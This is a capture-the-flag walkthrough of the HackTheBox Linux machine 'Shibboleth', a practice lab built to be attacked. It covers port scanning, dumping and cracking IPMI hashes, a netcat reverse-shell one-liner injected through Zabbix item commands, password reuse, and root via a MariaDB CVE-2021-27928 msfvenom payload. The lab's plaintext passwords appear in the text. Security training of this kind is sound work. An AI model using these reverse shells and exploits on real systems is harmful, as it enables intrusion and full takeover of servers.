Shibboleth - [HTB]

Cover Image for Shibboleth - [HTB]


Shibboleth is a medium Linux machine from HackTheBox where the attacker will have to enumerate TCP and UDP ports, finding a IPMI service that can be used to retrieve IPMI hashes. Once cracked the hashes the attacker will gain access to the Zabbix platform where can obtain a reverse shell as Zabbix. Finally, the attacker will have to exploit a vulnerability on MariaDB (CVE-2021-27928) becoming root.


As always, let's start finding all opened ports in the machine with Nmap.

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sS -p- -n -T5 -oN AllPorts.txt
Warning: giving up on port because retransmission cap hit (2).
Nmap scan report for
Host is up (0.053s latency).
Not shown: 64898 closed ports, 636 filtered ports
80/tcp open  http

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -v -sU -n -T3 -oN AllPortsUDP.txt
Nmap scan report for
Host is up (0.18s latency).
Not shown: 999 closed udp ports (port-unreach)
623/udp open  asf-rmcp

Then, we continue with a deeper scan of every opened port, getting more information about each service.

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 80
Nmap scan report for
Host is up (0.051s latency).

80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

kali@kali:~/Documents/HTB/Shibboleth$ sudo nmap -sU -sC -sV -p 623 -n -oN PortsDepthUDP.txt
Starting Nmap 7.92 ( ) at 2021-11-28 14:45 EST
Nmap scan report for
Host is up (0.17s latency).

623/udp open  asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

# Nmap done at Sun Nov 28 15:01:34 2021 

Adding the domain shibboleth.htb to the /etc/hosts file we can access to this web page.

Web page

Searching for subdomains with Ffuz we can find the followings.

kali@kali:~/Documents/HTB/Shibboleth$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://shibboleth.htb/ -o vhosts.txt -H "Host: FUZZ.shibboleth.htb" -fc 302

monitor                 [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring              [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix                  [Status: 200, Size: 3686, Words: 192, Lines: 30]

Looking for enumeration methods for the asf-rmcp port. There is a rapid7 post where we can find a Metasploit module for dumping ipmi hashes.

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                             Required  Description
   ----                  ---------------                             --------  -----------
   CRACK_COMMON          true                                        yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                               no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                  no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing common passwords for offline cracking, one per line
   RHOSTS                                      yes       The target host(s), see
   RPORT                 623                                         yes       The target port
   SESSION_MAX_ATTEMPTS  5                                           yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                           yes       Delay between session retries in seconds
   THREADS               1                                           yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordl  yes       File containing usernames, one per line

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > exploit

[+] - IPMI - Hash found: Administrator:e390caad02030000d690a68d88f1a6a30475a2b7e55e5cb775c0aa292af9a073aed44f9cf7377248a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e1fc0411bf8eef9cd04f8d792db9f3a37cae7bc5
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This hash can be cracked using hashcat.

kali@kali:~/Documents/HTB/Shibboleth$ hashcat -h | grep IPMI
   7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
kali@kali:~/Documents/HTB/Shibboleth$ hashcat -m 7300 IPMI_hash.txt /usr/share/wordlists/rockyou.txt 

These credentials can be used for access to the zabbix platform.


Zabbix allows users to execute commands on an agent, as we can see in this post. Hence, we can obtain a reverse shell.

For doing so, we need to access Configuration/Hosts/shibboleth.htb/Items, then create a new item with the following command.[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 4444 >/tmp/f &,nowait]
Zabbix RCE

Finally, we need to return to the Item and click on "Execute now" to execute the command, obtaining a shell as Zabbix.

$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)

Privilege Escalation 1

To become ipmi-svc we can reuse the same password.

zabbix@shibboleth:/tmp$ grep bash /etc/passwd
zabbix@shibboleth:/tmp$ su - ipmi-svc
Password: ilovepumkinpie1
ipmi-svc@shibboleth:~$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)
ipmi-svc@shibboleth:~$ cat user.txt

Privilege Escalation 2

Doing some enumeration with linpeas we see that MySql is being executed as the user root.

root        1137  0.0  0.0   2608  1880 ?        S    17:14   0:00 /bin/sh /usr/bin/mysqld_safe                                                               
root       16481  1.1  2.9 1741484 118280 ?      Sl   18:43   0:03  _ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-li
nux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/ --socket=/var/run/mysqld/mysqld.sock 

The credentials for accessing the database can be found at /etc/zabbix/zabbix_server.conf

ipmi-svc@shibboleth:/etc/zabbix$ ls -la
total 100
drwxr-xr-x  4 root     root      4096 Nov  8 11:02 .
drwxr-xr-x 96 root     root      4096 Nov  8 11:02 ..
-r--------  1 zabbix   zabbix      33 Apr 24  2021 peeesskay.psk
drwxr-xr-x  2 www-data root      4096 Apr 27  2021 web
-rw-r--r--  1 root     root     15317 May 25  2021 zabbix_agentd.conf
-rw-r--r--  1 root     root     15574 Oct 18 09:24 zabbix_agentd.conf.dpkg-dist
drwxr-xr-x  2 root     root      4096 Apr 27  2021 zabbix_agentd.d
-rw-r-----  1 root     ipmi-svc 21863 Apr 24  2021 zabbix_server.conf
-rw-r-----  1 root     ipmi-svc 22306 Oct 18 09:24 zabbix_server.conf.dpkg-dist

ipmi-svc@shibboleth:/etc/zabbix$ grep -Ev ^\#\|^$ zabbix_server.conf

Furthermore, the MariaDB version is associated with a PoC on GitHub.

ipmi-svc@shibboleth:/etc/zabbix$ mysql -u zabbix -pbloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 331
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 

In order to exploit it, you need to execute the following commands, getting a shell as root.

kali@kali:/tmp$ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4445 -f elf-so -o
kali@kali:/tmp$ python -m SimpleHTTPServer 
kali@kali:/tmp$ nc -lnvp 4455

ipmi-svc@shibboleth:/tmp$ wget
ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -pbloooarskybluh -e 'SET GLOBAL wsrep_provider="/tmp/";'
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query

kali@kali:~/Documents/HTB/Shibboleth$ nc -nlvp 4445
listening on [any] 4445 ...
connect to [] from (UNKNOWN) [] 41216
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt